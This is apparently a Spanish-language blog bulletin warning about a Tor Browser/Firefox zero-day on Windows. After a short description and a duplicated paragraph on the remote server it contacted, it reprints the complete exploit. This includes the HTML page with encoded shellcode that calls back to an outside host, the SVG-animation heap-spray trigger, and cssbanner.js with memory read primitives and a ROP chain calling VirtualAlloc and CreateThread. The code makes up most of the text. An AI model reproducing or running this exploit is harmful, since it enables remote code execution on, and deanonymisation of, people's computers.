BOLETIN DE EMERGENCIA
Mis estimados lectores.
Publico este boletín de emergencia ya que hace unas cuantas horas apareció una nueva vulnerabilidad del tipo 0day en el paquete de navegación anónima T0R y en el navegador FIREFOX, que es explotada en sistemas operativos WINDOWS con un 90% de éxito al atacar y afecta las versiones 41 y 50, que es la que la mayoría de nosotros tenemos instalada.
¿EN QUÉ CONSISTE ESTE EXPLOIT?
Se trata de una vulnerabilidad que se explota mediante JAVASCRIPT, activamente usada contra T0R Browser, con la generación de un archivo HTML y un CSS, con la cual obtienen acceso a VIRTUALALLOC en la API de KERNEL32.DLL.
y conectaba la shell incluida en el 0day a un servidor en la IP 5.39.27.226, que ya fue desactivado y estaba localizado en FRANCIA con el proveedor de servicios OVH; si buscas con SHODAN se puede apreciar que tenía un certificado SSL comodín (wildcard) para el dominio ENERGYCDN.
y, como podemos ver, es un servidor con páginas muy simples; si lo consultamos en ARCHIVE.ORG, no ha cambiado su diseño en más de 3 años, desde el 2014.
y conectaba la shell incluida en el 0day a un servidor en la IP 5.39.27.226, que ya fue desactivado y estaba localizado en FRANCIA con el proveedor de servicios OVH; si buscas con SHODAN se puede apreciar que tenía un certificado SSL comodín (wildcard) para el dominio ENERGYCDN.
y, como podemos ver, es un servidor con páginas muy simples; si lo consultamos en ARCHIVE.ORG, no ha cambiado su diseño en más de 3 años, desde el 2014.
En búsquedas en Google se ve claramente que ese CDN se usa normalmente para alojar torrents y contenido pirateado.
SE RECOMIENDA NO USAR FIREFOX POR EL MOMENTO, HASTA QUE EL BUG SEA PARCHADO.
CÓDIGO DEL EXPLOIT:
----------------------------------------------------------------------
<html> <head> <script> var thecode ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002 \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1\ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002\u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f' + 
'\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\ u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190'; var worker = new Worker('cssbanner.js'); worker.postMessage(thecode); var svgns = 'http://www.w3.org/2000/svg'; var heap80 = new Array(0x1000); var heap100 = new Array(0x4000); var block80 = new ArrayBuffer(0x80); var block100 = new ArrayBuffer(0x100); var sprayBase = undefined; var arrBase = undefined; var animateX = undefined; var containerA = undefined; var offset = 0x90; if (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)) { offset = 0x88; // versions 47.0 or greater } var $ = function(id) { return document.getElementById(id); } var exploit = function() { var u32 = new Uint32Array(block80) u32[0x2] = arrBase - offset; u32[0x8] = arrBase - offset; u32[0xE] = arrBase - offset; for(i = heap100.length/2; i < heap100.length; i++) { heap100[i] = block100.slice(0) } for(i = 0; i < heap80.length/2; i++) { heap80[i] = 
block80.slice(0) } animateX.setAttribute('begin', '59s') animateX.setAttribute('begin', '58s') for(i = heap80.length/2; i < heap80.length; i++) { heap80[i] = block80.slice(0) } for(i = heap100.length/2; i < heap100.length; i++) { heap100[i] = block100.slice(0) } animateX.setAttribute('begin', '10s') animateX.setAttribute('begin', '9s') window.dump('PAUSING!!! YAYA'); containerA.pauseAnimations(); } worker.onmessage = function(e) { worker.onmessage = function(e) { window.setTimeout(function() { worker.terminate(); document.body.innerHTML = ''; document.getElementsByTagName('head')[0].innerHTML = ''; document.body.setAttribute('onload', '') }, 1000); } arrBase = e.data; exploit(); } var idGenerator = function() { return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1); } var craftDOM = function() { containerA = document.createElementNS(svgns, 'svg') var containerB = document.createElementNS(svgns, 'svg'); animateX = document.createElementNS(svgns, 'animate') var animateA = document.createElementNS(svgns, 'animate') var animateB = document.createElementNS(svgns, 'animate') var animateC = document.createElementNS(svgns, 'animate') var idX = idGenerator(); var idA = idGenerator(); var idB = idGenerator(); var idC = idGenerator(); animateX.setAttribute('id', idX); animateA.setAttribute('id', idA); animateA.setAttribute('end', '50s'); animateB.setAttribute('id', idB); animateB.setAttribute('begin', '60s'); animateB.setAttribute('end', idC + '.end'); animateC.setAttribute('id', idC); animateC.setAttribute('begin', '10s'); animateC.setAttribute('end', idA + '.end'); containerA.appendChild(animateX) containerA.appendChild(animateA) containerA.appendChild(animateB) containerB.appendChild(animateC) document.body.appendChild(containerA); document.body.appendChild(containerB); } window.onload = craftDOM; // </script> <style> #mtdiv{ position: absolute; width: 960px; height: 166px; z-index: 15; top: 100px; left: 50%; margin: 0 0 0 -480px; } </style> </head> <body 
bgcolor='#2F3236'> <div id='mtdiv'> <img src='mt.png'/> </div> </body> <script> setTimeout('window.location = \'member.php\';', 2000); </script> </html>
====================================================
CONTENIDO DEL cssbanner.js
content of "cssbanner.js": self.onmessage = function(msg) { thecode = msg.data; var pack = function (b) { var a = b >> 16; return String.fromCharCode(b & 65535) + String.fromCharCode(a) }; function Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;this._abs_read=function(a){a>=this._base_addr?a=this._read(a-this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._read(a));return 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this._base_addr?this._write(a-this._base_addr,b):(a=4294967295-this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return this.read(a)&255};this.readWord=function(a){return this.read(a)&65535};this.readDword=function(a){return this.read(a)}; this.read=function(a,b){if(a%4){var c=this._abs_read(a&4294967292),d=this._abs_read(a+4&4294967292),e=a%4;return c>>>8*e|d<<8*(4-e)}return this._abs_read(a)};this.readStr=function(a){for(var b="",c=0;;){if(32==c)return"";var d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return b};this.write=function(a){}} function PE(b,a){this.mem=b;this.export_table=this.module_base=void 0;this.export_table_size=0;this.import_table=void 0;this.import_table_size=0;this.find_module_base=function(a){for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return this.module_base=a;a-=65536}};this._resolve_pe_structures=function(){peFile=this.module_base+this.mem.readWord(this.module_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad NT Signature";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory= this.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void 0==this.import_directory&&this._resolve_pe_structures();for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){var 
d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()== d.toUpperCase()){for(var c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return 0};void 0!=a&&this.find_module_base(a)} function ROP(b,a){this.mem=b;this.pe=new PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var b=0;;){for(var e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else break;if(e==a.length)return this.module_base+b;b++}};this.findStackPivot=function(){return this.findSequence([148,195])};this.findPopRet=function(a){return this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void 0!=c?c:new ArrayBuffer(4096); c=new Uint32Array(c);var d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return c}} var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return convu32[a]},sprayArrays=function(){for(var b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.length;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]=qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBase+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]=qword2Double(arrBase+ 
o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24)/8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+(o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Double(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0),b[a+(o7+16)/8]=qword2Double(0,4026531840),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double(1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/ 8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]=qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2),b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double(0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0),b[a+(o11+16)/8]=qword2Double(0,4026531840),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]=qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+ (o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++)spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)&&(vtable_offset=308); var spr=Array(400),arrBase=805306416,ropArrBuf=new ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928,o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0;fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u9090");sprayArrays();postMessage(arrBase); for(memarrayloc=void 0;void 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset<spr[i].length;offset+=512)if("object"!=typeof 
spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]=qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][offset+(o5+0)/8]=qword2Double(arrBase+ o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][offset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var mem=new Memory(memarrayloc+48,function(b){return memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDword(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+1]=null;ropBase=mem.readDword(ropPtr+16);var rop=new ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); var backupESP=rop.findSequence([137,1,195]),ropChain=new Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i++]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ropChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++]=280697892;ropChain[i++]=704643071; ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[i++]=2425393407;for(var j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]=qword2Double(0,256);spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);postMessage("GREAT SUCCESS"); }; Beautified: self.onmessage = function(msg) { thecode = msg.data; var pack = function (b) { var a = b >> 16; return String.fromCharCode(b & 65535) + 
String.fromCharCode(a) }; function Memory(b,a,f) { this._base_addr=b; this._read=a; this._write=f; this._abs_read = function(a) { a >= this._base_addr ? a = this._read( a - this._base_addr) : ( a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) ); return 0>a?4294967295+a+1:a }; this._abs_write = function(a,b) { a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a = 4294967295 - this._base_addr + 1 + a, this._write(a,b) ) }; this.readByte = function(a) { return this.read(a) & 255 }; this.readWord = function(a) { return this.read(a) & 65535 }; this.readDword = function(a){ return this.read(a) }; this.read = function(a,b) { if (a%4) { var c = this._abs_read( a & 4294967292), d = this._abs_read( a+4 & 4294967292), e = a%4; return c>>>8*e | d<<8*(4-e) } return this._abs_read(a) }; this.readStr = function(a) { for(var b = "", c = 0;;) { if (32 == c) return ""; var d = this.readByte(a+c); if(0 == d) break; b += String.fromCharCode(d); c++ } return b }; this.write = function(a){} } function PE(b,a) { this.mem = b; this.export_table = this.module_base = void 0; this.export_table_size = 0; this.import_table = void 0; this.import_table_size = 0; this.find_module_base = function(a) { for(a &= 4294901760; a; ) { if(23117 == this.mem.readWord(a)) return this.module_base=a; a -= 65536 } }; this._resolve_pe_structures = function() { peFile = this.module_base + this.mem.readWord(this.module_base+60); if(17744 != this.mem.readDword(peFile)) throw"Bad NT Signature"; this.pe_file = peFile; this.optional_header = this.pe_file+36; this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120); this.export_directory_size = this.mem.readDword(this.pe_file+124); this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128); this.import_directory_size=this.mem.readDword(this.pe_file+132)}; this.resolve_imported_function=function(a,b){ void 0==this.import_directory&&this._resolve_pe_structures(); for(var 
e=this.import_directory,c=e+this.import_directory_size;e<c;){ var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base); if(a.toUpperCase()==d.toUpperCase()){ for(var c = this.mem.readDword(e) + this.module_base, e = this.mem.readDword(e+16) + this.module_base, d = this.mem.readDword(c), f = 0 ; 0 !=d ;) { if(this.mem.readStr(d+this.module_base+2).toUpperCase() == b.toUpperCase()) return this.mem.readDword(e+4*f); f++; d = this.mem.readDword(c+4*f) } break } e+=20 } return 0 }; void 0!=a && this.find_module_base(a) } function ROP(b,a){ this.mem = b; this.pe = new PE(b,a); this.pe._resolve_pe_structures(); this.module_base = this.pe.module_base+4096; this.findSequence = function(a) { for(var b=0;;) { for(var e=0,c=0;c<a.length;c++) if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c) e++; else break; if(e==a.length) return this.module_base+b; b++ } }; this.findStackPivot=function() { return this.findSequence([148,195]) }; this.findPopRet=function(a) { return this.findSequence([88,195]) }; this.ropChain=function(a,b,e,c) { c = void 0 != c ? 
c : new ArrayBuffer(4096); c = new Uint32Array(c); var d = this.findStackPivot(), f = this.findPopRet("EAX"), g = this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc"); c[0]= f+1; c[1]= f; c[2]= a+b+4*e+4; c[3]= d; for(i=0;i<e;i++) c[(b>>2)+i] = d; d =(b+4>>2)+e; c[d++]=g; c[d++]=a+(b+4*e+28); c[d++]=a; c[d++]=4096; c[d++]=4096; c[d++]=64; c[d++]=3435973836; return c } } var conv=new ArrayBuffer(8), convf64=new Float64Array(conv), convu32=new Uint32Array(conv), qword2Double=function(b,a) { convu32[0]=b; convu32[1]=a; return convf64[0] }, doubleFromFloat = function(b,a) { convf64[0]=b; return convu32[a] }, sprayArrays=function() { for(var b=Array(262138),a=0;262138>a;a++) b[a]=fzero; for(a=0;a<b.length;a+=512) b[a+1] = memory, b[a+21] = qword2Double(0,2), b[a+14] = qword2Double(arrBase+o1,0), b[a+(o1+8)/8] = qword2Double(arrBase+o2,0), b[a+(o2+0)/8] = qword2Double(2,0), b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13), b[a+(o3+0)/8] = qword2Double(16,0), b[a+(o3+24)/8] = qword2Double(2,0), b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4), b[a+(o4+0)/8] = qword2Double(0,arrBase+o6), b[a+(o5+0)/8] = qword2Double(arrBase+o7,0), b[a+(o6+8)/8] = qword2Double(2,0), b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0), b[a+(o7+16)/8] = qword2Double(0,4026531840), b[a+(o7+32)/8] = qword2Double(0,3220176896), b[a+(o7+48)/8] = qword2Double(2,0), b[a+(o7+56)/8] = qword2Double(1,0), b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8), b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), b[a+(o7+168)/8] = qword2Double(0,2), b[a+(o9+0)/8] = qword2Double(arrBase+o10,2), b[a+(o10+0)/8] = qword2Double(2,0), b[a+(o10+8)/8] = qword2Double(0,268435456), b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0), b[a+(o11+16)/8] = qword2Double(0,4026531840), b[a+(o11+32)/8] = qword2Double(0,3220176896), b[a+(o11+48)/8] = qword2Double(2,0), b[a+(o11+56)/8] = qword2Double(1,0), b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8), b[a+(o11+112)/8] = 
qword2Double(arrBase+o9,arrBase+o9+16), b[a+(o11+168)/8] = qword2Double(0,2); for(a=0;a<spr.length;a++) spr[a]=b.slice(0) }, vtable_offset=300; /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)? vtable_offset=304 : /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent) && (vtable_offset=308); var spr=Array(400), arrBase=805306416, ropArrBuf=new ArrayBuffer(4096), o1=176, o2=256, o3=768, o4=832, o5=864, o6=928, o7=1024, o8=1280, o9=1344, o10=1376, o11=1536, oRop=1792, memory=new Uint32Array(16), len=memory.length, arr_index=0, arr_offset=0; fzero=qword2Double(0,0); 0!=thecode.length%2&&(thecode+="\u9090"); sprayArrays(); postMessage(arrBase); for(memarrayloc=void 0;void 0==memarrayloc;) for(i=0;i<spr.length;i++) for(offset=0;offset<spr[i].length;offset+=512) if("object" != typeof spr[i][offset+1]) { memarrayloc=doubleFromFloat(spr[i][offset+1],0); arr_index=i; arr_offset=offset; spr[i][offset+(o2+0)/8]=qword2Double(65,0); spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27); for(j=0;33>j;j++) spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27); spr[i][offset+(o3+8)/8]=qword2Double(0,0); spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0); spr[i][offset+(o7+168)/8]=qword2Double(0,3); spr[i][offset+(o7+88)/8]=qword2Double(0,2); break } for(;memory.length==len;); var mem=new Memory(memarrayloc+48, function(b){return memory[b/4]}, function(b,a){memory[b/4]=a}), xulPtr=mem.readDword(memarrayloc+12); spr[arr_index][arr_offset+1]=ropArrBuf; ropPtr=mem.readDword(arrBase+8); spr[arr_index][arr_offset+1]=null; ropBase=mem.readDword(ropPtr+16); var rop=new ROP(mem,xulPtr); rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); var backupESP=rop.findSequence([137,1,195]), ropChain=new Uint32Array(ropArrBuf); ropChain[0]=backupESP; CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread"); for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++); ropChain[i++]=3296825488; ropChain[i++]=2048; 
ropChain[i++]=1347469361; ropChain[i++]=1528949584; ropChain[i++]=3092271187; ropChain[i++]=CreateThread; ropChain[i++]=3096498431; ropChain[i++]=arrBase+16; ropChain[i++]=1955274891; ropChain[i++]=280697892; ropChain[i++]=704643071; ropChain[i++]=2425406428; ropChain[i++]=4294957800; ropChain[i++]=2425393407; for (var j=0;j<thecode.length;j+=2) ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1); spr[arr_index][arr_offset]=qword2Double(arrBase+16,0); spr[arr_index][arr_offset+3]=qword2Double(0,256); spr[arr_index][arr_offset+2]=qword2Double(ropBase,0); spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3); spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2); postMessage("GREAT SUCCESS"); };